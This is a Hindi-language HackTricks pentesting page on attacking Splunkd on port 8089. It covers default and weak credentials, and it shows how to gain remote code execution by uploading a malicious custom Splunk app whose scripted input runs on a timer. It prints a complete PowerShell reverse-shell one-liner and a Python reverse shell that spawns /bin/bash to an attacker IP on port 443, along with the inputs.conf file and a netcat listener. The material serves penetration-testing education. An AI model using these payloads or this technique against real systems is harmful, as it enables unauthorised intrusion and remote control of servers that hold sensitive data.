# 8089 - Splunkd का पेंटेस्टिंग
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
## **मूलभूत जानकारी**
**Splunk** एक **लॉग विश्लेषण उपकरण** है जिसका उपयोग डेटा को इकट्ठा करने, विश्लेषण करने और दृश्यीकरण करने के लिए किया जाता है। हालांकि, पहले से यह एक SIEM उपकरण के लिए निर्मित नहीं था, लेकिन Splunk को अक्सर **सुरक्षा मॉनिटरिंग और व्यावसायिक विश्लेषण** के लिए उपयोग किया जाता है। Splunk डिप्लॉयमेंट अक्सर **संवेदनशील डेटा** को होस्ट करने के लिए उपयोग किया जाता है और यदि कंप्रोमाइज़ हो जाए, तो एक हमलावर के लिए बहुत सारी जानकारी प्रदान कर सकता है।
**डिफ़ॉल्ट पोर्ट:** 8089
```
PORT STATE SERVICE VERSION
8089/tcp open http Splunkd httpd
```
{% hint style="info" %}
**Splunk वेब सर्वर डिफ़ॉल्ट रूप से पोर्ट 8000 पर चलता है।**
{% endhint %}
## जांच
### मुफ़्त संस्करण
Splunk Enterprise परीक्षण के बाद 60 दिनों के बाद एक **मुफ़्त संस्करण में बदल जाता है**, जिसमें **प्रमाणीकरण की आवश्यकता नहीं होती है**। सिस्टम प्रशासकों के लिए सामान्य है कि वे Splunk का परीक्षण करने के लिए एक परीक्षण संस्करण स्थापित करें, जिसे बाद में भूल जाते हैं। यह स्वचालित रूप से मुफ़्त संस्करण में बदल जाएगा जिसमें किसी भी प्रकार की प्रमाणीकरण नहीं होती है, जो पर्यावरण में एक सुरक्षा गड्ढा प्रविष्ट करता है। कुछ संगठन बजट सीमाओं के कारण मुफ़्त संस्करण का चयन कर सकते हैं, जिसमें उपयोगकर्ता / भूमिका प्रबंधन की कोई भी प्रकार की व्यवस्था नहीं होती है।
### डिफ़ॉल्ट प्रमाणपत्र
पुराने संस्करणों में Splunk के डिफ़ॉल्ट प्रमाणपत्र हैं **`admin:changeme`**, जो लॉगिन पेज पर सुविधाजनक रूप से प्रदर्शित होते हैं।\
हालांकि, **Splunk के नवीनतम संस्करण** में **प्रमाणपत्र** **स्थापना प्रक्रिया के दौरान सेट किए जाते हैं**। यदि डिफ़ॉल्ट प्रमाणपत्र काम नहीं करते हैं, तो `admin`, `Welcome`, `Welcome1`, `Password123` आदि जैसे सामान्य कमजोर पासवर्ड की जांच करने में मूल्य होता है।
### जानकारी प्राप्त करें
Splunk में लॉगिन करने के बाद, हम **डेटा ब्राउज़ कर सकते हैं**, **रिपोर्ट चला सकते हैं**, **डैशबोर्ड बना सकते हैं**, Splunkbase पुस्तकालय से **एप्लिकेशन स्थापित कर सकते हैं**, और कस्टम एप्लिकेशन स्थापित कर सकते हैं।\
आप कोड भी चला सकते हैं: Splunk में कोड चलाने के कई तरीके हैं, जैसे सर्वर-साइड Django एप्लिकेशन, REST एंडपॉइंट, स्क्रिप्टेड इनपुट्स, और अलर्टिंग स्क्रिप्ट्स। Splunk सर्वर पर दूरस्थ कोड निष्पादन करने का एक सामान्य तरीका स्क्रिप्टेड इनपुट का उपयोग करके होता है।
इसके अलावा, Splunk को Windows या Linux होस्ट पर स्थापित किया जा सकता है, इसलिए स्क्रिप्टेड इनपुट्स बनाए जा सकते हैं जो Bash, PowerShell, या Batch स्क्रिप्ट्स चलाने के लिए उपयोग करते हैं।
### शोडन
* `Splunk बिल्ड`
## RCE
### कस्टम एप्लिकेशन बनाएं
कस्टम एप्लिकेशन **Python, Batch, Bash, या PowerShell स्क्रिप्ट्स चला सकता है**।\
ध्यान दें कि **Splunk में Python स्थापित होता है**, इसलिए **Windows** सिस्टम में भी आप पायथन कोड चला सकेंगे।
आप [**इस**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk पैकेज का उपयोग कर सकते हैं। इस रेपो में **`bin`** निर्देशिका में [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) और [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1) के लिए उदाहरण हैं। चलिए इसे चरण-दर-चरण देखते हैं।
इसके लिए, हमें पहले निम्नलिखित निर्देशिका संरचना का उपयोग करके एक कस्टम Splunk एप्लिकेशन बनाने की आवश्यकता होगी:
```shell-session
tree splunk_shell/
splunk_shell/
├── bin
└── default
```
**`bin`** निर्देशिका में हमारे द्वारा चलाने की योजना बनाई गई कोई भी स्क्रिप्ट (इस मामले में, एक **PowerShell** रिवर्स शेल) होगी, और डिफ़ॉल्ट निर्देशिका में हमारी `inputs.conf` फ़ाइल होगी। हमारा रिवर्स शेल एक **PowerShell वन-लाइनर** होगा:
```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(
```
[inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) फ़ाइल Splunk को **कौन सा स्क्रिप्ट चलाना है** और किसी अन्य शर्त को बताती है। यहां हम ऐप को सक्षम करते हैं और Splunk को हर 10 सेकंड में स्क्रिप्ट चलाने के लिए कहते हैं। अंतराल हमेशा सेकंड में होता है, और इन सेटिंग्स के मौजूद होने पर ही इनपुट (स्क्रिप्ट) चलेगा।
```shell-session
cat inputs.conf
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```
हमें `.bat` फ़ाइल की आवश्यकता है, जो एप्लिकेशन डिप्लॉय होने पर चलेगी और PowerShell वन-लाइनर को निष्पादित करेगी।
अगला कदम है `Install app from file` का चयन करना और एप्लिकेशन अपलोड करना।
हानिकारक कस्टम ऐप अपलोड करने से पहले, हम Netcat या [socat](https://linux.die.net/man/1/socat) का उपयोग करके एक लिस्टनर शुरू करेंगे।
```shell-session
sudo nc -lnvp 443
listening on [any] 443 ...
```
**अपलोड ऐप** पृष्ठ पर, ब्राउज़ पर क्लिक करें, पहले से बनाए गए टारबॉल को चुनें और **अपलोड** पर क्लिक करें। \*\*\*\* **जैसे ही हम ऐप्लिकेशन अपलोड करते हैं**, ऐप्लिकेशन की स्थिति स्वचालित रूप से `सक्षम` पर स्विच कर दी जाएगी और हमें एक **रिवर्स शेल प्राप्त होगा**।
#### लिनक्स
यदि हम **लिनक्स होस्ट** के साथ काम कर रहे होते, तो हमें टारबॉल बनाने और कस्टम विषाक्त ऐप अपलोड करने से पहले **`rev.py` पायथन स्क्रिप्ट को संपादित करने की आवश्यकता होगी**। बाकी प्रक्रिया समान रहेगी और हमें अपने नेटकैट सुनने वाले प्रश्नकर्ता पर रिवर्स शेल कनेक्शन मिलेगा और हम शुरू हो जाएंगे।
```python
import sys,socket,os,pty
ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```
### RCE और विशेषाधिकार उन्नयन
निम्नलिखित पृष्ठ में आपको यह समझने में मदद मिलेगी कि इस सेवा का दुरुपयोग कैसे किया जा सकता है ताकि विशेषाधिकार उन्नयन और स्थायित्व प्राप्त किया जा सके:
{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
{% endcontent-ref %}
## संदर्भ
* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**